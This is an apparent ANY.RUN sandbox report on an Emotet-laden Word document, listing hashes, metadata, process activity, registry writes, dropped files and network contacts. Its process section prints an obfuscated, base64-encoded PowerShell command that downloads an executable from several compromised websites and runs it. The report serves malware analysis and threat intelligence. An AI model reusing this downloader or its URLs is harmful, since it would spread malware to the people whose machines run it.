analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

e7fe088857fc5b07b08c461363cfcfa9ce9ddf97.doc

Full analysis: https://app.any.run/tasks/3dc7161e-b6a5-4e89-9a05-e7421cae5c39
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 09:00:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: seize mobile Handmade Fresh Chicken, Subject: generating, Author: Meagan Kuvalis, Comments: Kuwaiti Dinar, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:11:00 2019, Last Saved Time/Date: Thu Sep 19 08:11:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

16A064689918137707FC9E92671FA681

SHA1:

E7FE088857FC5B07B08C461363CFCFA9CE9DDF97

SHA256:

820C65C6EF01642AB6280B5CC80F98B24572841D5BCEC34769037BDE8B3D2CD0

SSDEEP:

6144:dxNVifQ2eqPobQZbrwIQOVPLkIq7NSU4jJntATfDQ3XvbbD:dxNVifQ2eqPobQZbrwIQOFXq7NSU4VeU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2368)

    • Creates files in the user directory

      • powershell.exe (PID: 2368)

    • PowerShell script executed

      • powershell.exe (PID: 2368)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3368)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3368)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2368)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Kohler
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Zulauf and Sons
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:19 07:11:00
CreateDate: 2019:09:19 07:11:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Kuwaiti Dinar
Keywords: -
Author: Meagan Kuvalis
Subject: generating
Title: seize mobile Handmade Fresh Chicken
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3368"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e7fe088857fc5b07b08c461363cfcfa9ce9ddf97.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2368powershell -encod JABhAE0AUABjAFoAMwBqAD0AJwBZAFgAaAB3AE0AagAnADsAJABSAGkAUwBUADAAcAAgAD0AIAAnADcAMQAnADsAJABiAE0ATQA2AFAAbwA9ACcAdABiAHEAMwAyAFoARABrACcAOwAkAG4AVgBBADkAMgA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABSAGkAUwBUADAAcAArACcALgBlAHgAZQAnADsAJABsAEkAMQA0AHoAYQA2AD0AJwBmAFcASQBDAE8AUQB3ACcAOwAkAGwAdQBIAEMAbgBaAFMAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAGIAQwBsAEkAZQBOAHQAOwAkAHQARgBrADMARgBOAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB1AG4AaQB0AGUAZABtAGUAZABzAHMAaABvAHAALgBjAG8AbQAvAHgAeABqAHkAdwAvAEgAbgBGAFoASQBLAFIALwBAAGgAdAB0AHAAOgAvAC8AYwBlAG4AZwBpAHoAZwB1AGwAZQByAC4AYwBvAG0ALgB0AHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUgB2AHAASABiAHkAZQAvAEAAaAB0AHQAcABzADoALwAvAGsAZQB0AG8AcgBlAGMAaQBwAGUAcwBsAGMAaABmAC4AcwBpAHQAZQAvAHQAZQBzAHQALwByADQAaQBhAGQALQBiAG0AMABpADcAZgAtADcANwAwADcAOAA1AC8AQABoAHQAdABwAHMAOgAvAC8AYgBvAG4AZABiAGUAbgBnAGEAbABzAC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADYAMQAzADQALQA5AGYAMAAtADEANwA0ADcAMAAwADYAOAAvAEAAaAB0AHQAcABzADoALwAvAGIAaQBrAGUAbABvAHYAZQByAHMALgBiAGwAbwBnAC4AYgByAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ATQBnAHEARQBtAGIAQgBCAC8AJwAuACIAUwBgAFAAbABJAHQAIgAoACcAQAAnACkAOwAkAEkAbAA4AG0AdQBjAEEAPQAnAEoAbgAwAGQATABMAEcAVgAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB6AEUAegA4AGgAbQAwACAAaQBuACAAJAB0AEYAawAzAEYATgApAHsAdAByAHkAewAkAGwAdQBIAEMAbgBaAFMALgAiAEQAYABPAGAAdwBuAEwATwBBAEQARgBgAGkATABlACIAKAAkAEkAegBFAHoAOABoAG0AMAAsACAAJABuAFYAQQA5ADIAOAApADsAJABoAFgAegBBADMARQBHAD0AJwBWAGIAbQBDAFIAZgBaAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABuAFYAQQA5ADIAOAApAC4AIgBMAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAOQA0ADAANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABuAFYAQQA5ADIAOAApADsAJABVADQAdgBmAHUAdgBsAD0AJwB6ADcANQBVAGQAZAAnADsAYgByAGUAYQBrADsAJABpAEUAaABuADMAUgBxAD0AJwBpAHIAMAB3AHYAbgBPACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAG8AbgBSAFIASABpADAAYQA9ACcAYwBSAGsAdwBTAEIAMgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 414
Read events
941
Write events
468
Delete events
5

Modification events

(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:%e#
Value:
25652300280D0000010000000000000000000000
(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3368) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1328742430
(PID) Process:(3368) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742544
(PID) Process:(3368) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742545
(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
280D0000D8F64DB6C86ED50100000000
(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:|f#
Value:
7C662300280D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:|f#
Value:
7C662300280D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3368) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3368WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR99A5.tmp.cvr
MD5:
SHA256:
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23B331F2.wmfwmf
MD5:3FF77EEFF0B066CE223D14CC94D4D667
SHA256:C2FC21F1A420EDF8F98BA2A665B37DBD1539055919AB8AD0450C967CA3D38186
3368WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B03EA916A8FF7009547D85C4D58B09AF
SHA256:4A1DCBF039B57D4E84C7F1E457F2395A0FCE85942C46ED3892AB5648FE5F4FDB
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A24856D0.wmfwmf
MD5:CD777F0EA50ED60B236F964CED9BEC4C
SHA256:038E6C6118237593D72C27B280C7494670AD314F7A997F972C36848435AA4651
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A934891.wmfwmf
MD5:46DEF7EFD221D616992CAD86F6682134
SHA256:1958BE16E1D093337194F8CC2C906C84630FF348AB5FC9DE0B7433DF6C81CFAE
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C42C3565.wmfwmf
MD5:8902B0199E27D2A500E7F6F8D112D5C1
SHA256:035A5DD1D8CDFE175849CD781ADA6599A1D9E5C06A56C309D6484A7629609D21
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2F04675.wmfwmf
MD5:85946955E42EC475401C5977914B09E1
SHA256:3021F6617EB04A319A2BC0D2376F6F2398752C51B1940B556FE0C05CBC1E1020
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E50A0409.wmfwmf
MD5:D1EAC0E79018DB7338FE8D339544BEF8
SHA256:CCFE9FBA4D9EFFE5324FAF756E8C0B4D29B0F336F683D9069DFED0F2B65EA095
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5039A91C.wmfwmf
MD5:A1B1F64935908DC14249B1CC0AFC782C
SHA256:1EF6504414BB185D6ADE5E8A21D1EF077123CE2BB0212E2AC3059FDABD8F6A4A
3368WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\502069C7.wmfwmf
MD5:1370768C2E0E31901449DBA2F6499B78
SHA256:4935909F4F3E56FBB9A02E185F0A5BA495A61D93B403DE2752718784A3393552
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2368
powershell.exe
104.28.26.31:443
www.unitedmedsshop.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
www.unitedmedsshop.com
  • 104.28.26.31
  • 104.28.27.31
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
e7fe088857fc5b07b08c461363cfcfa9ce9ddf97.doc